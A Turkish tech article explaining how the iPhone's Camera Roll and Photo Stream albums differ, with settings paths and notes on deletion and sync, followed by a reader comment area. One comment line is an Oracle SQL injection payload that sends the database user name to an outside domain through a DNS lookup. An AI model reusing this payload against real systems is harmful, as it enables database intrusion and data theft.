Film Rulosu ve Foto Yayını Arasındaki Fark Nedir?

Eğer iPhone kullanıcısıysanız farkına varmışsınızdır ki iPhone ile çektiğiniz fotoğraf iki farklı albümde saklanıyor; Film Rulosu ve Foto Yayını. Peki, Film Rulosu ve Foto Yayını arasındaki fark nedir?
23 Haziran 2014 12:51
Film Rulosu ve Foto Yayını Arasındaki Fark Nedir?
Çoğu kişinin bu konuda kafası karışmış. Peki nedir bunların farkı? Neden iki farklı klasörde kaydoluyor? Bazen ise sadece birinde saklanıyor veya fotoğrafı bir klasörden sildiğinizde diğer klasörde ki de siliniyor. Bu karışıklığı gidermek için haberimizi okumanız yeterli. 
 
Film Rulosu sizin cihazınızda sabit olarak kalır ancak Foto Yayını sizin bulutunuz ve tüm diğer cihazlarınız ile senkronizasyonu olarak görevlidir. Film Rulosunun aksine Foto Yayını’nızı elle etkinleştirmeniz gerekir. 
 
 
Peki bunlar nasıl çalışıyor? 
 
Film rulosu
 
 
Film rulosu oldukça basittir. Bu albüm cihazınızda depolanan fotoğraflardan oluşur. Çektiğiniz, mesajlardan veya web sitelerinden kaydettiğiniz resimler burada saklanıyor. 
 
Örneğin telefonunuzda bir fotoğraf çektiğinizde anında orada saklanır ve Foto Yayını’nı da etkinleştirdiyseniz oraya da saklanır.
 
Foto yayını
 
 
Foto yayını ise biraz daha karmaşıktır. Bu albüm, Apple’ın bulut tabanlı depolama hizmeti olan iCloud tabanlı çalışır ve aygıtlar arasında fotoğraf paylaşımı için bir merkezi konum olarak hareket eder. 
 
Senkronizasyon için kablolarla uğraşmak yerine Foto Yayını herhangi bir cihazdan anlık erişim sağlar. Eğer Foto Yayını klasörünüz varsa bunun anlamı iCloud ile cihazınızın bağlantısının sağlandığıdır.
 
Cihazınızda bu klasör yoksa şu şekilde etkinleştirebilirsiniz:
 
iOS cihazınızdan; Ayarlar > iCloud > Fotoğraflar klasöründen erişebilirsiniz. Buradan Foto Yayını butonunu etkinleştirmeniz yeterli.
 
Mac cihazınızdan; Sistem Tercihleri > iCloud > Fotoğraflar klasöründen kontrol edebilirsiniz. Ayrıca iPhoto veya Aperture gibi uygulamalarla Foto Yayını’nın açık durumda olup olmadığını kontrol edebilirsiniz. 
 
PC: iCloud Denetim Masası’nı açın ve resimler kutusuna tıklayın. Foto Yayını’nın açık olup olmadığını görmek için Seçenekler’i tıklayın.
 
 
Böylece çektiğiniz fotoğraflar iki ayrı klasörde depolanmış olur. Ayrıca iPhone ile çektiğiniz fotoğraflar iPad ve Mac üzerinde de görünür olacaktır. Bu otomatik olarak Wi-Fi üzerinden paylaşılır ve siz ek olarak indirme işlemi gerçekleştirememiş olursunuz. 
 
Artı tarafı Apple’ın bu hizmet için ücret almaması. Bu yüzden herhangi bir abonelik veya kayıt ücreti verme gibi bir endişeniz bulunmasın. Tüm ihtiyacınız olan iCloud’u destekleyen bir cihazınızın olması. 
Ancak bu ücretsiz hizmet beraberinde bazı kısıtlamaları da getiriyor. Foto Yayını’nda 1000’den fazla fotoğraf saklayamıyorsunuz. Bu yüzden Film Rulosu daha cazip gelebilir. 
 
Gelelim en çok sorulan soruya; Eğer “istemeden” bu iki klasörden de fotoğraflarınızı silmek istemiyorsanız bunları bilmeniz gerekmekte:
 
Eğer bir fotoğrafı Foto Yayını’ndan silerseniz otomatik olarak iCloud ve buna bağlı tüm cihazlarınızdan da silecektir. Ancak bir kopyası Kamera Rulo’sunda duracaktır.
 
 
 
 
Eğer Film Rulo’su üzerinden fotoğrafınızı silerseniz Foto Yayını’nda bir kopyasını bırakacaktır. 
 
Eğer Wi-Fi’a bağlı değilseniz Foto Yayını’na yedekleme yapamayacağı için Film Rulosu’ndan silerseniz bir daha o fotoğrafa erişemezsiniz ve Foto Yayını’nın 1000 fotoğraflık kapasitesi olduğunu unutmayın.
 
Çeviri: incehesap
Etiketler : Apple , iOS , iphone , MAC , PC , tekno rehber
777184
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
02 Ağustos 2016, Salı 23:34
Foto yayınındaki fotoğraflar biz istemeden başkası tarafından görüntülenebilirmi
Bu haberler ilginizi çekebilir